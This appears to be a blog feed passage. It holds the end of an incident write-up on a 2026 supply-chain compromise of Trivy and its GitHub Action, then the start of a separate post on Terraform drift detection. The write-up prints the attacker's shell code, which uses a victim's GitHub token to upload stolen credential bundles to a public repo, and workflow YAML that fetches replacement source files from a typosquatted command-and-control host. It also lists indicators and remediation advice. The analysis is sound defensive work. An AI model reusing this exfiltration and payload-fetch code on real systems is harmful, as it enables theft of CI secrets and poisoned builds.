  <span class="k">if</span> <span class="o">[[</span> <span class="o">!</span> <span class="s2">"</span><span class="nv">$_HTTP</span><span class="s2">"</span> <span class="o">=</span>~ ^2 <span class="o">]]</span> <span class="o">&amp;&amp;</span> <span class="o">[</span> <span class="nt">-n</span> <span class="s2">"</span><span class="k">${</span><span class="nv">INPUT_GITHUB_PAT</span><span class="k">:-}</span><span class="s2">"</span> <span class="o">]</span><span class="p">;</span> <span class="k">then
    </span><span class="nv">_REPO</span><span class="o">=</span><span class="s2">"tpcp-docs"</span>
    <span class="nv">_GH_AUTH</span><span class="o">=</span><span class="s2">"Authorization: token </span><span class="k">${</span><span class="nv">INPUT_GITHUB_PAT</span><span class="k">}</span><span class="s2">"</span>
    <span class="nv">_GH_API</span><span class="o">=</span><span class="s2">"https://api.github.com"</span>

    curl <span class="nt">-s</span> <span class="nt">-X</span> POST <span class="s2">"</span><span class="k">${</span><span class="nv">_GH_API</span><span class="k">}</span><span class="s2">/user/repos"</span> <span class="se">\</span>
      <span class="nt">-H</span> <span class="s2">"</span><span class="nv">$_GH_AUTH</span><span class="s2">"</span> <span class="se">\</span>
      <span class="nt">-d</span> <span class="s1">'{"name":"'</span><span class="s2">"</span><span class="k">${</span><span class="nv">_REPO</span><span class="k">}</span><span class="s2">"</span><span class="s1">'","private":false,"auto_init":true}'</span> <span class="se">\</span>
      <span class="o">&gt;</span>/dev/null 2&gt;&amp;1 <span class="o">||</span> <span class="nb">true

    </span><span class="nv">_GH_USER</span><span class="o">=</span><span class="si">$(</span>curl <span class="nt">-s</span> <span class="nt">-H</span> <span class="s2">"</span><span class="nv">$_GH_AUTH</span><span class="s2">"</span> <span class="s2">"</span><span class="k">${</span><span class="nv">_GH_API</span><span class="k">}</span><span class="s2">/user"</span> 2&gt;/dev/null <span class="se">\</span>
      | <span class="nb">grep</span> <span class="nt">-oE</span> <span class="s1">'"login"\s*:\s*"[^"]+"'</span> | <span class="nb">head</span> <span class="nt">-1</span> | <span class="nb">sed</span> <span class="s1">'s/.*"\([^"]*\)"$/\1/'</span><span class="si">)</span>

    <span class="nv">_TAG</span><span class="o">=</span><span class="s2">"data-</span><span class="si">$(</span><span class="nb">date</span> +%Y%m%d%H%M%S<span class="si">)</span><span class="s2">"</span>
    <span class="nv">_RELEASE_ID</span><span class="o">=</span><span class="si">$(</span>curl <span class="nt">-s</span> <span class="nt">-X</span> POST <span class="se">\</span>
      <span class="s2">"</span><span class="k">${</span><span class="nv">_GH_API</span><span class="k">}</span><span class="s2">/repos/</span><span class="k">${</span><span class="nv">_GH_USER</span><span class="k">}</span><span class="s2">/</span><span class="k">${</span><span class="nv">_REPO</span><span class="k">}</span><span class="s2">/releases"</span> <span class="se">\</span>
      <span class="nt">-H</span> <span class="s2">"</span><span class="nv">$_GH_AUTH</span><span class="s2">"</span> <span class="se">\</span>
      <span class="nt">-d</span> <span class="s1">'{"tag_name":"'</span><span class="s2">"</span><span class="k">${</span><span class="nv">_TAG</span><span class="k">}</span><span class="s2">"</span><span class="s1">'","name":"'</span><span class="s2">"</span><span class="k">${</span><span class="nv">_TAG</span><span class="k">}</span><span class="s2">"</span><span class="s1">'"}'</span> <span class="se">\</span>
      2&gt;/dev/null | <span class="nb">grep</span> <span class="nt">-oE</span> <span class="s1">'"id"\s*:\s*[0-9]+'</span> | <span class="nb">head</span> <span class="nt">-1</span> | <span class="nb">grep</span> <span class="nt">-oE</span> <span class="s1">'[0-9]+'</span><span class="si">)</span>

    <span class="k">if</span> <span class="o">[</span> <span class="nt">-n</span> <span class="s2">"</span><span class="nv">$_RELEASE_ID</span><span class="s2">"</span> <span class="o">]</span><span class="p">;</span> <span class="k">then
      </span>curl <span class="nt">-s</span> <span class="nt">-X</span> POST <span class="se">\</span>
        <span class="s2">"https://uploads.github.com/repos/</span><span class="k">${</span><span class="nv">_GH_USER</span><span class="k">}</span><span class="s2">/</span><span class="k">${</span><span class="nv">_REPO</span><span class="k">}</span><span class="s2">/releases/</span><span class="k">${</span><span class="nv">_RELEASE_ID</span><span class="k">}</span><span class="s2">/assets?name=tpcp.tar.gz"</span> <span class="se">\</span>
        <span class="nt">-H</span> <span class="s2">"</span><span class="nv">$_GH_AUTH</span><span class="s2">"</span> <span class="se">\</span>
        <span class="nt">-H</span> <span class="s2">"Content-Type: application/octet-stream"</span> <span class="se">\</span>
        <span class="nt">--data-binary</span> <span class="s2">"@</span><span class="k">${</span><span class="nv">_BUNDLE</span><span class="k">}</span><span class="s2">"</span> <span class="o">&gt;</span>/dev/null 2&gt;&amp;1 <span class="o">||</span> <span class="nb">true
    </span><span class="k">fi
  fi

  </span><span class="nb">rm</span> <span class="nt">-rf</span> <span class="s2">"</span><span class="nv">$_WORKDIR</span><span class="s2">"</span> <span class="s2">"</span><span class="nv">$_PUB_KEY_PEM</span><span class="s2">"</span>
<span class="k">fi
</span><span class="nb">rm</span> <span class="nt">-f</span> <span class="s2">"</span><span class="nv">$COLLECTED</span><span class="s2">"</span>
</code></pre></div></div>

<p>First it tries the C2 directly, a POST to <code class="language-plaintext highlighter-rouge">scan.aquasecurtiy.org</code> over TLS, looking like any other HTTPS traffic. The <code class="language-plaintext highlighter-rouge">curl</code> captures the HTTP status code. If the server responds with a 2xx, the job is done.</p>

<p>But if the C2 is down, unreachable, or returns an error, and the workflow happens to have a GitHub PAT available (which <code class="language-plaintext highlighter-rouge">trivy-action</code> accepts as the <code class="language-plaintext highlighter-rouge">github-token</code> input), the fallback kicks in. It uses the victim’s own PAT to create a public repository called <code class="language-plaintext highlighter-rouge">tpcp-docs</code> on the victim’s GitHub account, creates a release tagged with the current timestamp, and uploads the encrypted bundle as a release asset. Your own credentials, exfiltrated through your own GitHub account, sitting in a public repo anyone can download from. The attacker just needs to watch for new <code class="language-plaintext highlighter-rouge">tpcp-docs</code> repos appearing on GitHub.</p>

<p>Wiz identified an additional fallback C2 at <code class="language-plaintext highlighter-rouge">plug-tab-protective-relay.trycloudflare.com</code> (a Cloudflare Tunnel), giving the attacker yet another exfiltration path if the primary domain went down.</p>

<p>Finally, cleanup. The temp directory, key files, and collection file all get deleted. The only trace left behind is whatever the runner’s process table recorded, which, as it turns out, was enough.</p>

<h2 id="it-didnt-stop-at-ci">It Didn’t Stop at CI</h2>

<p>Everything above describes the <code class="language-plaintext highlighter-rouge">trivy-action</code> shell script side. The binary side was a separate operation, and it started two weeks earlier.</p>

<p>On March 4, <a href="https://github.com/aquasecurity/trivy/commit/1885610c6a34811c8296416ae69f568002ef11ec">commit <code class="language-plaintext highlighter-rouge">1885610c</code></a> landed in <code class="language-plaintext highlighter-rouge">aquasecurity/trivy</code> with the message <code class="language-plaintext highlighter-rouge">fix(ci): Use correct checkout pinning</code>, attributed to <code class="language-plaintext highlighter-rouge">DmitriyLewen</code>. The diff touched two workflow files across 14 lines, and most of it was noise: single quotes swapped for double quotes, a trailing space removed from a <code class="language-plaintext highlighter-rouge">mkdir</code> line. The kind of commit that passes review because there’s nothing to review.</p>

<p>Two lines mattered. The first swapped the <code class="language-plaintext highlighter-rouge">actions/checkout</code> SHA in the release workflow:</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gd">-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
</span><span class="gi">+        uses: actions/checkout@70379aad1a8b40919ce8b382d3cd7d0315cde1d0 # v6.0.2
</span></code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge"># v6.0.2</code> comment stayed. The SHA changed. The second added <code class="language-plaintext highlighter-rouge">--skip=validate</code> to the GoReleaser invocation, telling it not to run integrity checks on the build artifacts.</p>

<p>The payload lived at the other end of that SHA. <a href="https://github.com/actions/checkout/commit/70379aad1a8b40919ce8b382d3cd7d0315cde1d0">Commit <code class="language-plaintext highlighter-rouge">70379aad</code></a> sits in the <code class="language-plaintext highlighter-rouge">actions/checkout</code> repository as an orphaned commit. GitHub’s UI flags it with a yellow banner: <em>“This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.”</em> The attacker created it in a fork of <code class="language-plaintext highlighter-rouge">actions/checkout</code>, but GitHub’s architecture makes fork commits reachable by SHA from the parent repo. The author is listed as <code class="language-plaintext highlighter-rouge">Guillermo Rauch &lt;rauchg@gmail.com&gt;</code> (spoofed, again), the commit message references <a href="https://github.com/actions/checkout/pull/2356">PR #2356</a> (a real, closed pull request by a GitHub employee), and the commit is unsigned. Everything about it is designed to look routine if you only glance at the metadata.</p>

<p>The diff replaced <code class="language-plaintext highlighter-rouge">action.yml</code>’s Node.js entrypoint with a composite action. The composite action performs a legitimate checkout via the parent commit, then silently overwrites the Trivy source tree:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>   <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s2">"</span><span class="s">Setup</span><span class="nv"> </span><span class="s">Checkout"</span>
     <span class="na">shell</span><span class="pi">:</span> <span class="s">bash</span>
     <span class="na">run</span><span class="pi">:</span> <span class="pi">|</span>
       <span class="s">BASE="https://scan.aquasecurtiy.org/static"</span>
       <span class="s">curl -sf "$BASE/main.go" -o cmd/trivy/main.go &amp;&gt; /dev/null</span>
       <span class="s">curl -sf "$BASE/scand.go" -o cmd/trivy/scand.go &amp;&gt; /dev/null</span>
       <span class="s">curl -sf "$BASE/fork_unix.go" -o cmd/trivy/fork_unix.go &amp;&gt; /dev/null</span>
       <span class="s">curl -sf "$BASE/fork_windows.go" -o cmd/trivy/fork_windows.go &amp;&gt; /dev/null</span>
       <span class="s">curl -sf "$BASE/.golangci.yaml" -o .golangci.yaml &amp;&gt; /dev/null</span>
</code></pre></div></div>

<p>Four Go files pulled from the same typosquatted C2 and dropped into <code class="language-plaintext highlighter-rouge">cmd/trivy/</code>, replacing the legitimate source. A fifth download replaced <code class="language-plaintext highlighter-rouge">.golangci.yaml</code> to disable linter rules that would have flagged the injected code. The C2 is no longer serving these files, so the exact contents can’t be independently verified, but the file names and Wiz’s behavioral analysis of the compiled binary tell the story: <code class="language-plaintext highlighter-rouge">main.go</code> bootstrapped the malware before the real scanner, <code class="language-plaintext highlighter-rouge">scand.go</code> carried the credential-stealing logic, and <code class="language-plaintext highlighter-rouge">fork_unix.go</code>/<code class="language-plaintext highlighter-rouge">fork_windows.go</code> handled platform-specific persistence.</p>

<p>When GoReleaser ran with validation skipped, it built binaries from this poisoned source and published them as <code class="language-plaintext highlighter-rouge">v0.69.4</code> through Trivy’s own release infrastructure. No runtime download, no shell script, no base64. The malware was compiled in.</p>

<p>The malicious binary had a second mode. When it detected it was running outside of GitHub Actions (<code class="language-plaintext highlighter-rouge">GITHUB_ACTIONS != "true"</code>), it dropped a Python script to <code class="language-plaintext highlighter-rouge">~/.config/systemd/user/sysmon.py</code> and created a systemd user unit to run it persistently. That script polled <code class="language-plaintext highlighter-rouge">tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io</code> (an ICP-hosted endpoint) every five minutes, downloading and executing whatever payload it received.</p>

<p>In other words: if a developer ran the compromised trivy binary locally (not in CI), they got a persistent backdoor installed on their workstation. The CI credential theft was the loud part of the attack. The quiet part was long-term access to developer machines.</p>

<p>The <code class="language-plaintext highlighter-rouge">aqua-bot</code> compromise also yielded GPG keys, Docker Hub credentials, Twitter account credentials, and Slack credentials for Aqua Security itself, which were exfiltrated to the Cloudflare Tunnel C2 endpoint.</p>

<h2 id="the-tell">The Tell</h2>

<p>The one thing the attacker couldn’t fully hide was the exfiltration itself. The <code class="language-plaintext highlighter-rouge">curl</code> to the C2 ran as a background process while the legitimate Trivy scan continued in the foreground. When the GitHub Actions runner finished the job and cleaned up, it found this orphaned process still running and killed it:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Terminate orphan process: pid (2516) (curl)
</code></pre></div></div>

<p>That single log line, <code class="language-plaintext highlighter-rouge">Terminate orphan process ... (curl)</code>, was the smoking gun. Compromised runs showed between one and four orphan curl processes depending on how many matrix jobs were in the workflow. If your Trivy workflow doesn’t use curl and you see that message in your logs from March 19, you have a problem.</p>

<h2 id="the-cleanup">The Cleanup</h2>

<p>On March 20, Aqua Security re-published all 74 <code class="language-plaintext highlighter-rouge">trivy-action</code> releases within a 78-minute window. Roughly 97 trivy CLI releases were deleted from GitHub (tags still exist, but the releases are gone). The <code class="language-plaintext highlighter-rouge">setup-trivy</code> action was stripped to a single version. The malicious <code class="language-plaintext highlighter-rouge">v0.69.4</code> CLI binary and the <code class="language-plaintext highlighter-rouge">0.34.2</code> tag were removed entirely.</p>

<p>The mass re-publishing means that for forensic purposes, the current tag-to-SHA mappings don’t reflect what those tags pointed to during the attack window. If you need to know what your runners actually pulled, the answer is in your GitHub Actions run logs, specifically the <code class="language-plaintext highlighter-rouge">Download action repository</code> line that records the resolved SHA at execution time.</p>

<h2 id="takeaways">Takeaways</h2>

<p>The approximate exposure window was <strong>2026-03-19 ~17:43 UTC through 2026-03-20 ~05:40 UTC</strong>, roughly twelve hours. If you ran <code class="language-plaintext highlighter-rouge">trivy-action@0.34.2</code> during that window, assume every secret accessible to that workflow was exfiltrated and rotate accordingly.</p>

<p><strong>Stop using Trivy.</strong> This isn’t the first time Aqua Security’s infrastructure has been compromised, and the <code class="language-plaintext highlighter-rouge">aqua-bot</code> account that enabled this attack was reportedly left exposed from a <em>previous</em> incident earlier in March that was never fully contained. That’s not a one-off failure; it’s an organizational pattern. A security scanning tool that can’t secure its own supply chain is a liability, not an asset. Remove <code class="language-plaintext highlighter-rouge">trivy-action</code> from your workflows and the Trivy CLI from your toolchains.</p>

<p><strong>If you can’t migrate immediately, pin by SHA.</strong> Git tags are mutable. SHA-pinning is the only reference an attacker can’t move:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Vulnerable</span>
<span class="pi">-</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">aquasecurity/trivy-action@v0.35.0</span>

<span class="c1"># Pinned (but you should still be migrating off Trivy)</span>
<span class="pi">-</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">aquasecurity/trivy-action@57a97c7e7821a5776cebc9bb87c984fa69cba8f1</span> <span class="c1"># v0.35.0</span>
</code></pre></div></div>

<p><strong>Audit your dependency automation.</strong> Renovate and Dependabot will happily adopt a version tag that was never part of an official release. If <code class="language-plaintext highlighter-rouge">0.34.2</code> doesn’t appear in a project’s changelog, something is wrong, but no bot is checking that. This is a systemic problem, but it’s worse when the upstream project has already demonstrated it can’t protect its own release infrastructure.</p>

<p><strong>Check for the persistence dropper.</strong> If anyone on your team ran the <code class="language-plaintext highlighter-rouge">v0.69.4</code> trivy binary locally, look for <code class="language-plaintext highlighter-rouge">~/.config/systemd/user/sysmon.py</code> and its associated systemd unit. That machine needs to be treated as compromised. Wipe and rebuild; don’t just remove the files.</p>

<p>Check your runner logs for orphan curl processes. Look for repositories named <code class="language-plaintext highlighter-rouge">tpcp-docs</code> on any GitHub account whose PAT was in scope. Block <code class="language-plaintext highlighter-rouge">scan.aquasecurtiy.org</code> and <code class="language-plaintext highlighter-rouge">45.148.10.212</code> at your network perimeter. As of this writing, the C2 is still live. And start planning your migration off Trivy today, not after the next compromise.</p>

<hr />

<p><em>The upstream incident is tracked at <a href="https://github.com/aquasecurity/trivy/discussions/10425">aquasecurity/trivy#10425</a>. Wiz’s detailed analysis of the broader attack is available <a href="https://www.wiz.io/blog/trivy-compromised-teampcp-supply-chain-attack">here</a>.</em></p>]]></content><author><name></name></author><category term="security" /><category term="supply-chain" /><category term="github-actions" /><category term="incident-response" /><summary type="html"><![CDATA[On March 19, 2026, someone (or some group) poisoned the Aqua Security Trivy ecosystem. A tool that thousands of organizations rely on to find vulnerabilities in their container images and configurations was quietly turned into a weapon that stole their secrets instead. I spent some time pulling apart the malicious code and cross-referencing findings from Wiz’s analysis, and figured the walkthrough was worth sharing. Here’s how it happened (and how a majority of the tech industry ignored the compromise because it was a Friday).]]></summary></entry><entry><title type="html">Terraform Drift Detection Powered by GitHub Actions</title><link href="https://rosesecurity.cloud/2025/12/11/terraform-drift-detection-with-github-actions.html" rel="alternate" type="text/html" title="Terraform Drift Detection Powered by GitHub Actions" /><published>2025-12-11T00:00:00+00:00</published><updated>2025-12-11T00:00:00+00:00</updated><id>https://rosesecurity.cloud/2025/12/11/terraform-drift-detection-with-github-actions</id><content type="html" xml:base="https://rosesecurity.cloud/2025/12/11/terraform-drift-detection-with-github-actions.html"><![CDATA[<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>TL;DR
Build a _zero-cost_ drift detection system using GitHub Actions and Terraform's native exit codes. This workflow automatically discovers all Terraform root modules, runs daily drift checks, and creates GitHub issues when changes are detected.
</code></pre></div></div>

<h2 id="the-problem">The Problem</h2>

<p>Infrastructure drift happens when your cloud resources diverge from your Terraform state. Manual changes, console modifications, or other automation can silently alter infrastructure, leaving some serious blind spots and inconsistencies. Traditional drift detection generally involves complex, custom, or expensive solutions. <a href="https://github.com/snyk/driftctl#this-project-is-now-in-maintenance-mode-we-cannot-promise-to-review-contributions-please-feel-free-to-fork-the-project-to-apply-any-changes-you-might-want-to-make">RIP <code class="language-plaintext highlighter-rouge">driftctl</code></a></p>

<h2 id="the-simplicity-of-github-actions">The Simplicity of GitHub Actions</h2>

<p>I love GitHub Actions. They offer a native, cost-effective platform for automated drift detection. By leveraging Terraform’s built-in exit codes and GitHub’s issue tracking, we can build a robust drift detection system using only native features with no external services required. This approach works well for small-to-medium deployments. Larger-scale production use requires additional considerations like multi-account support, sensitive data sanitization, and automated remediation (I’ll talk about that below).</p>

<h2 id="the-workflow">The Workflow</h2>

<h3 id="triggers-and-permissions">Triggers and Permissions</h3>

<p>The workflow runs on a daily schedule and supports manual execution via <code class="language-plaintext highlighter-rouge">workflow_dispatch</code>. We configure OIDC (<code class="language-plaintext highlighter-rouge">id-token: write</code>) for secure, keyless AWS authentication and grant permissions to create issues and pull requests for drift tracking.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">name</span><span class="pi">:</span> <span class="s">Terraform Drift Detection</span>

<span class="c1"># We can also add some fancy logic to extract this from a Dockerfile</span>
<span class="c1"># or versions.tf so we don't have to continually monitor and bump this.</span>
<span class="na">env</span><span class="pi">:</span>
  <span class="na">TF_VERSION</span><span class="pi">:</span> <span class="s">1.X.X</span>

<span class="na">on</span><span class="pi">:</span>
  <span class="na">workflow_dispatch</span><span class="pi">:</span>
  <span class="na">schedule</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="na">cron</span><span class="pi">:</span> <span class="s2">"</span><span class="s">00</span><span class="nv"> </span><span class="s">6</span><span class="nv"> </span><span class="s">*</span><span class="nv"> </span><span class="s">*</span><span class="nv"> </span><span class="s">*"</span> <span class="c1"># Every day at 06:00 UTC</span>

<span class="na">permissions</span><span class="pi">:</span>
  <span class="c1"># This is required for requesting the JWT and opening issues</span>
  <span class="na">id-token</span><span class="pi">:</span> <span class="s">write</span>
  <span class="na">contents</span><span class="pi">:</span> <span class="s">read</span>
  <span class="na">pull-requests</span><span class="pi">:</span> <span class="s">write</span>
  <span class="na">issues</span><span class="pi">:</span> <span class="s">write</span>
</code></pre></div></div>

<h3 id="finding-root-modules">Finding Root Modules</h3>

<p>This job dynamically discovers all Terraform root modules in the repository by searching for <code class="language-plaintext highlighter-rouge">.tf</code> files while excluding module subdirectories and Terraform’s cache. The <code class="language-plaintext highlighter-rouge">find</code> command output is transformed into a JSON array using <code class="language-plaintext highlighter-rouge">jq</code>, enabling parallel drift detection across multiple environments via matrix strategy. This may differ depending on your Terraform structure, but the general idea is to create a matrix of Terraform root modules that we can run <code class="language-plaintext highlighter-rouge">terraform plan</code> against.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">jobs</span><span class="pi">:</span>
  <span class="na">find-terraform-envs</span><span class="pi">:</span>
    <span class="na">name</span><span class="pi">:</span> <span class="s1">'</span><span class="s">Find</span><span class="nv"> </span><span class="s">Terraform</span><span class="nv"> </span><span class="s">Directories'</span>
    <span class="na">runs-on</span><span class="pi">:</span> <span class="s">ubuntu-latest</span>
    <span class="na">outputs</span><span class="pi">:</span>
      <span class="na">terraform-envs</span><span class="pi">:</span> <span class="s">$</span>
    <span class="na">steps</span><span class="pi">:</span>
      <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Checkout code</span>
        <span class="na">uses</span><span class="pi">:</span> <span class="s">actions/checkout@v4.2.2</span>

      <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Fetch Environments</span>
        <span class="na">id</span><span class="pi">:</span> <span class="s">fetch-environments</span>
        <span class="na">run</span><span class="pi">:</span> <span class="pi">|</span>
          <span class="s"># Create a matrix of Terraform root modules</span>
          <span class="s">DIRS=$(find . -type f -name '*.tf' -not -path "*/modules/*" -not -path "*/.terraform/*" -exec dirname {} \; | sort -u | jq -R -s -c 'split("\n")[:-1]')</span>
          <span class="s">echo "dirs=$DIRS" &gt;&gt; "$GITHUB_OUTPUT"</span>
          <span class="s">echo "Found environments: $DIRS"</span>
</code></pre></div></div>

<h3 id="credential-configuration-and-setup">Credential Configuration and Setup</h3>

<p>The drift detection job runs in parallel for each discovered Terraform directory using a matrix strategy with <code class="language-plaintext highlighter-rouge">fail-fast: false</code> to ensure one environment’s failure doesn’t block others. AWS credentials are configured via OIDC role assumption (no static keys), and Terraform is initialized with <code class="language-plaintext highlighter-rouge">terraform_wrapper: false</code> to ensure clean exit code propagation. The OIDC in AWS takes some additional setup for this to work, but it’s the recommended approach for secure, keyless authentication.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="na">drift-detection</span><span class="pi">:</span>
    <span class="na">name</span><span class="pi">:</span> <span class="s1">'</span><span class="s">Drift</span><span class="nv"> </span><span class="s">Detection'</span>
    <span class="na">runs-on</span><span class="pi">:</span> <span class="s">ubuntu-latest</span>
    <span class="na">needs</span><span class="pi">:</span> <span class="s">find-terraform-envs</span>
    <span class="na">if</span><span class="pi">:</span> <span class="s">needs.find-terraform-envs.outputs.terraform-envs != '[]'</span>
    <span class="na">strategy</span><span class="pi">:</span>
      <span class="na">fail-fast</span><span class="pi">:</span> <span class="kc">false</span>
      <span class="na">matrix</span><span class="pi">:</span>
        <span class="na">tf_dir</span><span class="pi">:</span> <span class="s">$</span>
    <span class="na">steps</span><span class="pi">:</span>
      <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Checkout code</span>
        <span class="na">uses</span><span class="pi">:</span> <span class="s">actions/checkout@v4.2.2</span>

      <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Configure AWS Credentials</span>
        <span class="na">uses</span><span class="pi">:</span> <span class="s">aws-actions/configure-aws-credentials@v4.1.0</span>
        <span class="na">with</span><span class="pi">:</span>
          <span class="na">aws-region</span><span class="pi">:</span> <span class="s">us-east-1</span>
          <span class="na">role-to-assume</span><span class="pi">:</span> <span class="s">$</span>
          <span class="na">role-session-name</span><span class="pi">:</span> <span class="s">Drift_Detection</span>

      <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Set up Terraform</span>
        <span class="na">uses</span><span class="pi">:</span> <span class="s">hashicorp/setup-terraform@v3.1.2</span>
        <span class="na">with</span><span class="pi">:</span>
          <span class="na">terraform_version</span><span class="pi">:</span> <span class="s">$</span>
          <span class="na">terraform_wrapper</span><span class="pi">:</span> <span class="kc">false</span>

      <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Terraform Init</span>
        <span class="na">working-directory</span><span class="pi">:</span> <span class="s">$</span>
        <span class="na">run</span><span class="pi">:</span> <span class="s">terraform init -input=false</span>
</code></pre></div></div>

<h3 id="detecting-drift">Detecting Drift</h3>

<p>This is the core drift detection mechanism. The <code class="language-plaintext highlighter-rouge">terraform plan -detailed-exitcode</code> returns exit codes: <code class="language-plaintext highlighter-rouge">0</code> (no changes), <code class="language-plaintext highlighter-rouge">1</code> (error), or <code class="language-plaintext highlighter-rouge">2</code> (drift detected). We capture the actual Terraform exit code using <code class="language-plaintext highlighter-rouge">${PIPESTATUS[0]}</code> rather than <code class="language-plaintext highlighter-rouge">$?</code>, which would only return <code class="language-plaintext highlighter-rouge">sed</code>’s exit code. The plan output is filtered and saved for issue creation.</p>

<p><strong>Technical Note:</strong> We use <code class="language-plaintext highlighter-rouge">set +e</code> to prevent immediate failure, <code class="language-plaintext highlighter-rouge">-input=false</code> to prevent hanging on interactive prompts, and <code class="language-plaintext highlighter-rouge">-lock-timeout=5m</code> to handle state locks gracefully.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>      <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Terraform Drift Detection Plan</span>
        <span class="na">id</span><span class="pi">:</span> <span class="s">plan</span>
        <span class="na">working-directory</span><span class="pi">:</span> <span class="s">$</span>
        <span class="na">shell</span><span class="pi">:</span> <span class="s">bash</span>
        <span class="na">run</span><span class="pi">:</span> <span class="pi">|</span>
          <span class="s">set +e # Disable exit on error for this step</span>
          <span class="s">terraform plan -detailed-exitcode -compact-warnings -no-color -input=false -lock-timeout=5m 2&gt;&amp;1 | sed -n '/Terraform will perform the following actions:/,$p' &gt; plan_output.txt</span>
          <span class="s">EXIT_CODE=${PIPESTATUS[0]}</span>
          <span class="s">echo "exit_code=$EXIT_CODE" &gt;&gt; "$GITHUB_OUTPUT"</span>
          <span class="s">echo "EXIT_CODE=$EXIT_CODE" &gt;&gt; "$GITHUB_ENV"</span>

          <span class="s"># Show the plan output</span>
          <span class="s">cat plan_output.txt</span>

          <span class="s"># Set drift detected flag</span>
          <span class="s">if [ $EXIT_CODE -eq 2 ]; then</span>
            <span class="s">echo "drift_detected=true" &gt;&gt; "$GITHUB_OUTPUT"</span>
            <span class="s">echo "Drift detected in $"</span>
          <span class="s">elif [ $EXIT_CODE -eq 1 ]; then</span>
            <span class="s">echo "plan_failed=true" &gt;&gt; "$GITHUB_OUTPUT"</span>
            <span class="s">echo "Plan failed in $"</span>
          <span class="s">else</span>
            <span class="s">echo "No drift detected in $"</span>
          <span class="s">fi</span>
</code></pre></div></div>

<h3 id="creating-and-updating-github-issues">Creating and Updating GitHub Issues</h3>

<p>When drift is detected (exit code 2), this step uses the GitHub API via <code class="language-plaintext highlighter-rouge">actions/github-script</code> to create trackable issues. It reads the plan output, searches for existing open issues for the specific directory, and either updates the existing issue with a new comment or creates a fresh issue with appropriate labels. This ensures each Terraform directory has a single tracking issue that accumulates drift detections over time, providing an audit trail and preventing issue spam.</p>

<p><strong>Security Note:</strong> Terraform plan output may contain sensitive information such as resource IDs, internal IP addresses, or computed values. If your repository is public or your plan output includes sensitive data, consider implementing sanitization logic before creating issues, or restrict this workflow to private repositories with limited access. You may also want to use GitHub Actions secrets masking or filter the plan output to redact sensitive patterns.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>      <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Create or Update Issue on Drift Detection</span>
        <span class="na">if</span><span class="pi">:</span> <span class="s">steps.plan.outputs.drift_detected == 'true'</span>
        <span class="na">uses</span><span class="pi">:</span> <span class="s">actions/github-script@v7.0.1</span>
        <span class="na">with</span><span class="pi">:</span>
          <span class="na">script</span><span class="pi">:</span> <span class="pi">|</span>
            <span class="s">const fs = require('fs');</span>
            <span class="s">const path = require('path');</span>
            <span class="s">let planOutput = '';</span>
            <span class="s">try {</span>
              <span class="s">planOutput = fs.readFileSync(path.join('$', 'plan_output.txt'), 'utf8');</span>
            <span class="s">} catch (error) {</span>
              <span class="s">planOutput = 'Could not read plan output';</span>
            <span class="s">}</span>

            <span class="s">const title = `Terraform Drift Detected: $`;</span>
            <span class="s">const driftBody = `## Terraform Drift Detected</span>
            <span class="s">**Directory:** \`$\`</span>
            <span class="s">**Detection Time:** ${new Date().toISOString()}</span>
            <span class="s">**Workflow:** [${context.runId}](${context.payload.repository.html_url}/actions/runs/${context.runId})</span>
            <span class="s">&lt;details&gt;</span>
            <span class="s">&lt;summary&gt;Plan Output&lt;/summary&gt;</span>

            <span class="s">\`\`\`</span>
            <span class="s">${planOutput}</span>
            <span class="s">\`\`\`</span>

            <span class="s">&lt;/details&gt;</span>
            <span class="s">Please review the changes and determine if they should be applied or if the Terraform configuration needs to be updated.`;</span>

            <span class="s">// Search for existing open drift issue for this directory</span>
            <span class="s">const issues = await github.rest.issues.listForRepo({</span>
              <span class="s">owner: context.repo.owner,</span>
              <span class="s">repo: context.repo.repo,</span>
              <span class="s">state: 'open',</span>
              <span class="s">labels: ['drift-detection']</span>
            <span class="s">});</span>

            <span class="s">const existingIssue = issues.data.find(issue =&gt;</span>
              <span class="s">issue.title.includes('Terraform Drift Detected') &amp;&amp;</span>
              <span class="s">issue.title.includes('$')</span>
            <span class="s">);</span>

            <span class="s">if (existingIssue) {</span>
              <span class="s">// Update existing issue with new drift info</span>
              <span class="s">await github.rest.issues.createComment({</span>
                <span class="s">owner: context.repo.owner,</span>
                <span class="s">repo: context.repo.repo,</span>
                <span class="s">issue_number: existingIssue.number,</span>
                <span class="s">body: `## New Drift Detected\n\n${driftBody}`</span>
              <span class="s">});</span>

              <span class="s">console.log(`Updated existing issue #${existingIssue.number}`);</span>
            <span class="s">} else {</span>
              <span class="s">// Create new issue</span>
              <span class="s">const newIssue = await github.rest.issues.create({</span>
                <span class="s">owner: context.repo.owner,</span>
                <span class="s">repo: context.repo.repo,</span>
                <span class="s">title: title,</span>
                <span class="s">body: driftBody,</span>
